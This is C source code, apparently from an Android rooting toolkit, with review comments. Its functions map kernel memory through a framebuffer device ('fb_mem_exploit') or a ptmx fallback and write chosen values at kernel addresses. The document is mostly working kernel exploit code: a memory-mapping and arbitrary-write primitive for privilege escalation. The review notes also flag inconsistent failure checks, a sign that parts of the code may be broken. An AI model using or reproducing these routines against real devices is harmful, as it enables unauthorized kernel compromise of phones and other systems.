/*
 * Map the kernel window through the framebuffer device and hand it to
 * callback_func.
 *
 * callback_func  - receives the mapped address that corresponds to
 *                  PAGE_OFFSET, the KERNEL_SIZE constant and callback_param.
 * callback_param - opaque pointer forwarded unchanged to callback_func.
 *
 * Returns false when fb_mem_mmap() yields MAP_FAILED; otherwise the
 * callback's own result. The mapping and its descriptor are released by
 * fb_mem_munmap() before returning in the success case.
 *
 * NOTE(review): failure is detected here by comparing with MAP_FAILED,
 * while map_kernel_memory() in this file tests the same fb_mem_mmap()
 * result for NULL. Both cannot match fb_mem_mmap()'s real contract —
 * confirm which sentinel it returns; the definition is not in view.
 */
static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
  unsigned long int phys_offset = get_kernel_physical_offset();
  int map_fd;
  void *mapped;
  bool ok;

  /* The fb_mem offset is only adjusted when a kernel physical offset is known. */
  if (phys_offset != 0) {
    fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
  }

  mapped = fb_mem_mmap(&map_fd);
  if (mapped == MAP_FAILED) {
    return false;
  }

  ok = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, mapped),
                     KERNEL_SIZE,
                     callback_param);

  fb_mem_munmap(mapped, map_fd);

  return ok;
}
/*
 * Establish a mapping of kernel memory: first through ptmx_map_memory(),
 * and if that fails, through the framebuffer device.
 *
 * Side effects on file-scope state (definitions not in view):
 *   - calls setup_variables() when kernel_physical_offset is still zero;
 *   - resets fb_mmap_fd to -1 before trying, and again on total failure;
 *   - sets kernel_mapped_address to the address of whichever mapping worked;
 *   - stores the fb_mem_mmap() result in fb_mem_mmap_base (kept as-is even
 *     when that call failed).
 *
 * Returns true when either mapping succeeded, false otherwise.
 *
 * NOTE(review): the fb_mem_mmap() result is treated as failed only when it
 * is NULL, whereas attempt_mmap_fb_mem_exploit() compares it with
 * MAP_FAILED. Only one of these matches fb_mem_mmap()'s contract — verify
 * against its definition.
 */
bool
map_kernel_memory(void)
{
  /* Lazily initialise the physical offset; bail if that is impossible. */
  if (kernel_physical_offset == 0 && !setup_variables()) {
    return false;
  }

  fb_mmap_fd = -1;
  kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;

  if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
    return true;
  }

  /* ptmx path failed: fall back to the framebuffer mapping. */
  fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);

  printf("Attempt fb_mem_exploit...\n");
  fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);
  if (!fb_mem_mmap_base) {
    fb_mmap_fd = -1;
    return false;
  }

  kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
  return true;
}
/*
 * Write write_value at address through fb_mem, run the callback described
 * by info, then write restore_value back to the same address.
 *
 * address       - target address passed to fb_mem_write_value_at_address().
 * write_value   - value written before the callback runs.
 * restore_value - value written after the callback returns.
 * info          - forwarded to run_callback().
 *
 * Returns true when the first write succeeded (the callback was run),
 * false when it did not.
 *
 * NOTE(review): the result of the restoring write is not checked, so a
 * failed restore still reports true — there is no signal to the caller that
 * the original value was not put back.
 */
static bool
attempt_fb_mem_exploit(unsigned long int address,
                       unsigned long int write_value,
                       unsigned long int restore_value,
                       callback_info_t *info)
{
  unsigned long int phys_offset = get_kernel_physical_offset();

  /* The fb_mem offset is only adjusted when a kernel physical offset is known. */
  if (phys_offset != 0) {
    fb_mem_set_kernel_phys_offset(phys_offset - 0x00008000);
  }

  if (!fb_mem_write_value_at_address(address, write_value)) {
    return false;
  }

  run_callback(info);

  /* Best-effort restore; its return value is deliberately not inspected. */
  fb_mem_write_value_at_address(address, restore_value);

  return true;
}